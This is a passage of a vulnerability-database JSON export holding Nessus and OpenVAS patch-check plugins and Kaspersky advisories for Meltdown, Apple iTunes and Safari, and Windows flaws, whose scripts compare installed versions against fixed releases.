unauthorized memory reads via sidechannel attacks. This flaw is known as Meltdown. A local attacker could use this to expose sensitive information, including kernel memory.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-10T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : linux vulnerability (USN-3524-1) (Meltdown)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3524-1.NASL", "href": "https://www.tenable.com/plugins/nessus/105727", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3524-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105727);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2017-5754\");\n script_xref(name:\"USN\", value:\"3524-1\");\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux vulnerability (USN-3524-1) (Meltdown)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Jann Horn discovered that microprocessors utilizing speculative\nexecution and indirect branch prediction may allow unauthorized memory\nreads via sidechannel attacks. This flaw is known as Meltdown. A local\nattacker could use this to expose sensitive information, including\nkernel memory.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3524-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/10\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2023 Canonical, Inc. / NASL script (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-5754\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3524-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-139-generic\", pkgver:\"3.13.0-139.188\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-139-lowlatency\", pkgver:\"3.13.0-139.188\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic\", pkgver:\"3.13.0.139.148\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"3.13.0.139.148\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-lowlatency / etc\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-31T15:02:46", "description": "The remote host is running a version of RancherOS that is prior to v1.1.3, hence is vulnerable to local privilege-escalation vulnerability. An attacker can exploit this issue to cause a denial-of-service condition.\n\nSystems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2019-12-19T00:00:00", "type": "nessus", "title": "RancherOS < 1.1.3 Information Disclosure", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2020-08-19T00:00:00", "cpe": ["cpe:/o:rancher:rancheros"], "id": "RANCHEROS_1_1_3.NASL", "href": "https://www.tenable.com/plugins/nessus/132250", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @NOAGENT@\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132250);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/19\");\n\n script_cve_id(\"CVE-2017-5754\");\n script_bugtraq_id(102378);\n\n script_name(english:\"RancherOS < 1.1.3 Information Disclosure\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of RancherOS that is prior to\nv1.1.3, hence is vulnerable to local privilege-escalation vulnerability. \nAn attacker can exploit this issue to cause a denial-of-service condition.\n\nSystems with microprocessors utilizing speculative execution and\nindirect branch prediction may allow unauthorized disclosure of\ninformation to an attacker with local user access via a side-channel\nanalysis of the data cache.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://rancher.com/docs/os/v1.x/en/about/security/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/rancher/os/releases/tag/v1.1.3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to RancherOS v1.1.3 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5754\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:rancher:rancheros\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint_linux_distro.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RancherOS/version\", \"Host/RancherOS\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\n# Fix version is v1.1.3\nfix_version = '1.1.3';\nos = get_kb_item('Host/RancherOS');\n\nif (!os) audit(AUDIT_OS_NOT, 'RancherOS');\n\nos_ver = get_kb_item('Host/RancherOS/version');\nif (!os_ver)\n{\n exit(1, 'Could not determine the RancherOS version');\n}\n\nmatch = pregmatch(pattern:\"v([0-9\\.]+)\", string:os_ver);\n\nif (!isnull(match))\n{ \n version = match[1]; \n if (ver_compare(ver:version, fix:fix_version, strict:TRUE) == -1)\n {\n security_report_v4(\n port:0,\n severity:SECURITY_WARNING,\n extra:\n '\\n Installed version : ' + os_ver +\n '\\n Fixed version : v' + fix_version +\n '\\n'\n );\n }\n}\n\naudit(AUDIT_INST_VER_NOT_VULN, 'RancherOS', os_ver);", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}], "kaspersky": [{"lastseen": "2021-08-18T11:13:02", "description": "### *Detect date*:\n12/06/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Apple iTunes. Malicious users can exploit these vulnerabilities to execute arbitrary code and obtain sensitive information.\n\n### *Affected products*:\nApple iTunes earlier than 12.7.2\n\n### *Solution*:\nUpdate to latest version \n[Download iTunes](<https://www.apple.com/itunes/download/>)\n\n### *Original advisories*:\n[About the security content of iTunes 12.7.2 for Windows](<https://support.apple.com/en-us/HT208326>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Apple iTunes](<https://threats.kaspersky.com/en/product/Apple-iTunes/>)\n\n### *CVE-IDS*:\n[CVE-2017-15422](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15422>)4.3Warning \n[CVE-2017-7165](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7165>)6.8High \n[CVE-2017-13870](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13870>)6.8High \n[CVE-2017-7172](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7172>)9.3Critical \n[CVE-2017-13884](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13884>)6.8High \n[CVE-2017-13885](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13885>)6.8High \n[CVE-2017-7156](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7156>)6.8High \n[CVE-2017-7157](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7157>)6.8High \n[CVE-2017-13856](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13856>)6.8High \n[CVE-2017-7160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7160>)6.8High \n[CVE-2017-13864](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13864>)4.3Warning \n[CVE-2017-7153](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7153>)5.8High \n[CVE-2017-13866](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13866>)6.8High", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-06T00:00:00", "type": "kaspersky", "title": "KLA11279 Multiple vulnerabilities in Apple iTunes", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13864", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-15422", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7165", "CVE-2017-7172"], "modified": "2020-06-03T00:00:00", "id": "KLA11279", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11279/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-18T11:02:28", "description": "### *Detect date*:\n10/16/2017\n\n### *Severity*:\nHigh\n\n### *Description*:\nA spoofing vulnerability was found in Microsoft Products (Extended Support Update). Malicious users can exploit this vulnerability to spoof user interface.\n\n### *Affected products*:\nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for x64-based systems \nWindows Server 2012 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2016 \nWindows RT 8.1 \nWindows 10 Version 1703 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 1703 for 32-bit Systems \nWindows Server 2012 R2\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-13080](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-13080>) \n\n\n### *Impacts*:\nSUI \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2017-13080](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13080>)2.9Warning\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4041678](<http://support.microsoft.com/kb/4041678>) \n[4041681](<http://support.microsoft.com/kb/4041681>) \n[4042723](<http://support.microsoft.com/kb/4042723>)", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-10-16T00:00:00", "type": "kaspersky", "title": "KLA11852 Security UI vulnerability in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.9, "vectorString": "AV:A/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13080"], "modified": "2020-07-21T00:00:00", "id": "KLA11852", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11852/", "cvss": {"score": 2.9, "vector": "AV:A/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-18T11:02:29", "description": "### *Detect date*:\n10/16/2017\n\n### *Severity*:\nHigh\n\n### *Description*:\nA spoofing vulnerability was found in Microsoft Windows. Malicious users can exploit this vulnerability to spoof user interface.\n\n### *Affected products*:\nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nWindows 10 Version 1703 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2012 \nWindows RT 8.1 \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows Server 2016 \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2016 (Server Core installation) \nWindows Server 2012 R2 \nWindows 10 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1703 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 8.1 for x64-based systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-13080](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-13080>) \n\n\n### *Impacts*:\nSUI \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2017-13080](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13080>)2.9Warning\n\n### *KB list*:\n[4041689](<http://support.microsoft.com/kb/4041689>) \n[4041693](<http://support.microsoft.com/kb/4041693>) \n[4041687](<http://support.microsoft.com/kb/4041687>) \n[4041676](<http://support.microsoft.com/kb/4041676>) \n[4041690](<http://support.microsoft.com/kb/4041690>) \n[4041691](<http://support.microsoft.com/kb/4041691>) \n[4042895](<http://support.microsoft.com/kb/4042895>) \n[4041679](<http://support.microsoft.com/kb/4041679>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-10-16T00:00:00", "type": "kaspersky", "title": "KLA11851 Security UI vulnerability in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.9, "vectorString": "AV:A/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13080"], "modified": "2020-07-21T00:00:00", "id": "KLA11851", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11851/", "cvss": {"score": 2.9, "vector": "AV:A/AC:M/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2019-07-17T14:22:48", "description": "This host is installed with Apple Safari\n and is prone to multiple remote code execution vulnerabilities.", "cvss3": {}, "published": "2017-12-28T00:00:00", "type": "openvas", "title": "Apple Safari Security Updates( HT208324 )", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7161", "CVE-2017-5753", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-7165", "CVE-2017-13870", "CVE-2017-5715", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-13884", "CVE-2017-7157", "CVE-2017-13885"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310812284", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812284", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Safari Security Updates( HT208324 )\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:safari\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812284\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2017-7156\", \"CVE-2017-7157\", \"CVE-2017-7160\", \"CVE-2017-13856\",\n \"CVE-2017-13866\", \"CVE-2017-13870\", \"CVE-2017-5753\", \"CVE-2017-5715\",\n \"CVE-2017-7161\", \"CVE-2017-13885\", \"CVE-2017-7165\", \"CVE-2017-13884\",\n \"CVE-2017-7153\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-12-28 14:26:04 +0530 (Thu, 28 Dec 2017)\");\n script_name(\"Apple Safari Security Updates( HT208324 )\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Safari\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to multiple\n memory corruption issues, command injection issue in Web Inspector, redirect\n responses to '401 Unauthorized' and other multiple errors leading to 'speculative\n execution side-channel attacks' that affect many modern processors and\n operating systems including Intel, AMD, and ARM.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to execute arbitrary code or\n cause a denial of service or gain access to potentially sensitive information\n or spoof user interface.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari versions before 11.0.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari 11.0.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208324\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208403\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"macosx_safari_detect.nasl\");\n script_mandatory_keys(\"AppleSafari/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nsafVer = infos['version'];\npath = infos['location'];\n\n\nif(version_is_less(version:safVer, test_version:\"11.0.2\"))\n{\n report = report_fixed_ver(installed_version:safVer, fixed_version:\"11.0.2\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:40", "description": "This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-12-28T00:00:00", "type": "openvas", "title": "Apple iTunes Security Updates( HT208326 )", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13864", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-7157"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310812285", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812285", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iTunes Security Updates( HT208326 )\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, 